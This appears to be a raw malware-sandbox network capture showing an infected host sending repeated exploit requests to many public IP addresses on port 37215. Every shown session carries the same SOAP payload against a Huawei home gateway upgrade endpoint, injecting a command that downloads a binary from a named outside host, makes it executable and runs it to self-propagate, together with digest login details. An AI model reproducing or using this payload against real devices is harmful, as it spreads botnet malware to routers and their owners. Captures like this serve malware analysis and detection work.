69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  560192.168.2.134049650.169.85.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321371078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  561192.168.2.1351330157.114.188.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321387053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  562192.168.2.1343768197.84.63.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321400881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  563192.168.2.1335504157.149.149.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321422100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  564192.168.2.1334898105.37.158.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321609020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  565192.168.2.134774641.68.12.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321626902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  566192.168.2.1338350197.239.30.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321640968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  567192.168.2.135775041.236.236.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321669102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  568192.168.2.1346178176.137.108.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321682930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  569192.168.2.1334290157.240.182.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321700096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  570192.168.2.135128618.37.74.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321717024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
